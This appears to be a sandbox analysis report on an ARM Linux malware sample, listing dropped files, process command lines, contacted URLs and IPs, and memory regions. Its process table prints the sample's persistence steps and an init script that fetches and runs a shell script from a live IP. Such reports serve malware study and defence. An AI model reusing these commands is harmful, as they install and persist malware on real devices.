Files
| File Path | Type | Category | Malicious |
|---|---|---|---|
| arm7.nn-20241014-0317.elf | ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, with debug_info, not stripped | initial sample | |
| /etc/init.d/arm7.nn-20241014-0317.elf | POSIX shell script, ASCII text executable | dropped | |
| /etc/init.d/mybinary | POSIX shell script, ASCII text executable | dropped | |
| /etc/profile | ASCII text | dropped | |
| /etc/rc.local | POSIX shell script, ASCII text executable | dropped | |
| /boot/bootcmd | ASCII text | dropped | |
| /etc/inittab | ASCII text | dropped | |
| /etc/motd | ASCII text | dropped | |
| /etc/systemd/system/custom.service | ASCII text | dropped | |
| /memfd:snapd-env-generator (deleted) | ASCII text | dropped | |
| /tmp/qemu-open.JRkfZ0 (deleted) | ASCII text, with no line terminators | dropped | |
Processes
| Path | Cmdline | Malicious |
|---|---|---|
| /tmp/arm7.nn-20241014-0317.elf | /tmp/arm7.nn-20241014-0317.elf | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /bin/sh | /bin/sh -c "systemctl enable custom.service >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/systemctl | systemctl enable custom.service | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /bin/sh | /bin/sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/chmod | chmod +x /etc/init.d/mybinary | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /bin/sh | /bin/sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/ln | ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /bin/sh | /bin/sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm7.nn-20241014-0317.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm7.nn-20241014-0317.elf'\n /tmp/arm7.nn-20241014-0317.elf &\n wget http://87.120.84.247/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping arm7.nn-20241014-0317.elf'\n killall arm7.nn-20241014-0317.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/arm7.nn-20241014-0317.elf" | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /bin/sh | /bin/sh -c "chmod +x /etc/init.d/arm7.nn-20241014-0317.elf >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/chmod | chmod +x /etc/init.d/arm7.nn-20241014-0317.elf | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /bin/sh | /bin/sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/mkdir | mkdir -p /etc/rc.d | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /bin/sh | /bin/sh -c "ln -s /etc/init.d/arm7.nn-20241014-0317.elf /etc/rc.d/S99arm7.nn-20241014-0317.elf >/dev/null 2>&1" | |
| /bin/sh | - | |
| /usr/bin/ln | ln -s /etc/init.d/arm7.nn-20241014-0317.elf /etc/rc.d/S99arm7.nn-20241014-0317.elf | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /tmp/arm7.nn-20241014-0317.elf | - | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/libexec/gnome-session-binary | - | |
| /bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping | |
| /usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/systemd/systemd | - | |
| /usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator | |
| /usr/lib/systemd/systemd | - | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
| /usr/lib/udisks2/udisksd | - | |
| /usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 | |
39 further processes are not shown in this excerpt.
URLs
| Name | IP | Malicious |
|---|---|---|
| http://87.120.84.247/ | unknown | |
| http://87.120.84.247/curl.sh | unknown | |
| http://87.120.84.247/lol.sh | unknown | |
IPs
| IP | Domain | Country | Malicious |
|---|---|---|---|
| 44.16.160.26 | unknown | United States | |
| 37.24.249.116 | unknown | Germany | |
| 83.137.173.159 | unknown | Germany | |
| 15.214.12.109 | unknown | United States | |
| 145.251.89.48 | unknown | Sweden | |
| 192.72.93.104 | unknown | Taiwan; Republic of China (ROC) | |
| 57.175.58.206 | unknown | Belgium | |
| 98.217.7.244 | unknown | United States | |
| 183.26.185.3 | unknown | China | |
| 23.147.25.209 | unknown | Reserved | |
| 94.157.232.224 | unknown | Netherlands | |
| 125.70.1.191 | unknown | China | |
| 9.49.145.198 | unknown | United States | |
| 51.195.206.221 | unknown | France | |
| 50.148.190.167 | unknown | United States | |
| 68.79.250.163 | unknown | United States | |
| 82.249.237.104 | unknown | France | |
| 89.122.218.199 | unknown | Romania | |
| 89.156.236.170 | unknown | France | |
| 108.194.245.60 | unknown | United States | |
| 215.83.142.111 | unknown | United States | |
| 141.93.191.42 | unknown | Netherlands | |
| 54.191.182.223 | unknown | United States | |
| 126.251.172.245 | unknown | Japan | |
| 189.215.206.76 | unknown | Mexico | |
| 12.61.200.120 | unknown | United States | |
| 204.50.220.94 | unknown | Canada | |
| 104.124.6.21 | unknown | United States | |
| 184.23.186.178 | unknown | United States | |
| 80.127.194.131 | unknown | Netherlands | |
| 165.201.64.245 | unknown | United States | |
| 95.190.92.216 | unknown | Russian Federation | |
| 18.173.114.73 | unknown | United States | |
| 175.67.211.90 | unknown | China | |
| 11.9.118.150 | unknown | United States | |
| 2.106.88.98 | unknown | Denmark | |
| 100.179.23.4 | unknown | United States | |
| 75.137.117.248 | unknown | United States | |
| 96.76.82.66 | unknown | United States | |
| 116.251.7.56 | unknown | Australia | |
| 167.107.97.4 | unknown | United States | |
| 99.214.118.16 | unknown | Canada | |
| 83.188.137.211 | unknown | Sweden | |
| 12.150.124.23 | unknown | United States | |
| 193.92.36.116 | unknown | Greece | |
| 12.90.135.179 | unknown | United States | |
| 157.120.226.44 | unknown | United Kingdom | |
| 154.190.196.44 | unknown | Egypt | |
| 204.143.5.64 | unknown | United States | |
| 124.112.153.161 | unknown | China | |
| 187.200.136.57 | unknown | Mexico | |
| 39.53.241.39 | unknown | Pakistan | |
| 88.55.241.19 | unknown | Italy | |
| 115.246.144.183 | unknown | India | |
| 35.187.46.153 | unknown | United States | |
| 147.132.137.115 | unknown | Australia | |
| 147.201.81.51 | unknown | United Kingdom | |
| 219.152.25.215 | unknown | China | |
| 216.248.111.18 | unknown | United States | |
| 25.233.176.5 | unknown | United Kingdom | |
| 73.227.30.47 | unknown | United States | |
| 77.44.133.159 | unknown | Syrian Arab Republic | |
| 37.202.88.53 | unknown | Jordan | |
| 37.77.63.126 | unknown | Netherlands | |
| 25.54.199.191 | unknown | United Kingdom | |
| 152.71.160.253 | unknown | United Kingdom | |
| 187.242.155.35 | unknown | Mexico | |
| 157.232.246.25 | unknown | United States | |
| 12.76.213.170 | unknown | United States | |
| 165.38.160.42 | unknown | United States | |
| 88.143.185.147 | unknown | France | |
| 156.238.189.164 | unknown | Seychelles | |
| 29.39.190.159 | unknown | United States | |
| 221.48.15.173 | unknown | Japan | |
| 14.116.136.85 | unknown | China | |
| 180.233.40.87 | unknown | China | |
| 11.89.107.185 | unknown | United States | |
| 193.143.1.59 | unknown | unknown | |
| 148.227.253.98 | unknown | Mexico | |
| 128.253.97.199 | unknown | United States | |
| 221.142.223.41 | unknown | Korea, Republic of | |
| 93.88.38.33 | unknown | Italy | |
| 43.218.112.185 | unknown | Japan | |
| 25.123.126.211 | unknown | United Kingdom | |
| 166.108.61.59 | unknown | United States | |
| 179.15.192.40 | unknown | Colombia | |
| 130.230.171.14 | unknown | Finland | |
| 129.32.204.60 | unknown | United States | |
| 53.19.188.179 | unknown | Germany | |
| 24.163.133.54 | unknown | United States | |
| 94.137.110.102 | unknown | Sweden | |
| 36.15.107.199 | unknown | Japan | |
| 86.4.154.219 | unknown | United Kingdom | |
| 108.122.57.78 | unknown | United States | |
| 31.181.83.136 | unknown | Russian Federation | |
| 82.212.165.0 | unknown | Belgium | |
| 206.211.34.61 | unknown | United States | |
| 34.242.128.2 | unknown | United States | |
| 198.215.56.33 | unknown | United States | |
| 67.246.121.72 | unknown | United States | |
90 further IPs are not shown in this excerpt.
Memdumps
| Base Address | Regiontype | Protect | Malicious |
|---|---|---|---|
| 7fddd8036000 | page execute read | | |
| 7fddd8036000 | page execute read | | |
| 5560042cf000 | page read and write | | |
| 7fdee014c000 | page read and write | | |
| 7fdee0191000 | page read and write | | |
| 5560042d8000 | page read and write | | |
| 5560062ed000 | page read and write | | |
| 5560042cf000 | page read and write | | |
| 7fdedfe1e000 | page read and write | | |
| 7fdedf842000 | page read and write | | |
| 7fff08aac000 | page execute read | | |
| 7fdedec46000 | page read and write | | |
| 7fff08aac000 | page execute read | | |
| 7fddd8049000 | page read and write | | |
| 7fdedffff000 | page read and write | | |
| 7fff08a42000 | page read and write | | |
| 7fdedfe1e000 | page read and write | | |
| 7fded8021000 | page read and write | | |
| 7fdedf44e000 | page read and write | | |
| 7fddd803e000 | page read and write | | |
| 7fdee014c000 | page read and write | | |
| 7fdedfad0000 | page read and write | | |
| 556006a82000 | page read and write | | |
| 7fdedf4e0000 | page read and write | | |
| 7fdee0191000 | page read and write | | |
| 7fdedfc3c000 | page read and write | | |
| 7fdedfaad000 | page read and write | | |
| 7fdedf4e0000 | page read and write | | |
| 7fdedec46000 | page read and write | | |
| 7fddd8043000 | page read and write | | |
| 7fddd803e000 | page read and write | | |
| 7fded7fff000 | page read and write | | |
| 556006a82000 | page read and write | | |
| 55600407e000 | page execute read | | |
| 7fdedfad0000 | page read and write | | |
| 7fded8021000 | page read and write | | |
| 7fdee0128000 | page read and write | | |
| 7fdedf44e000 | page read and write | | |
| 7fff08a42000 | page read and write | | |
| 5560062ed000 | page read and write | | |
| 7fdedffff000 | page read and write | | |
| 7fded7fff000 | page read and write | | |
| 7fdee0128000 | page read and write | | |
| 5560062d6000 | page execute and read and write | | |
| 7fdedf842000 | page read and write | | |
| 7fddd8043000 | page read and write | | |
| 5560042d8000 | page read and write | | |
| 7fdedfc3c000 | page read and write | | |
| 55600407e000 | page execute read | | |
| 7fdedfaad000 | page read and write | | |
| 5560062d6000 | page execute and read and write | | |
41 further memdumps are not shown in this excerpt.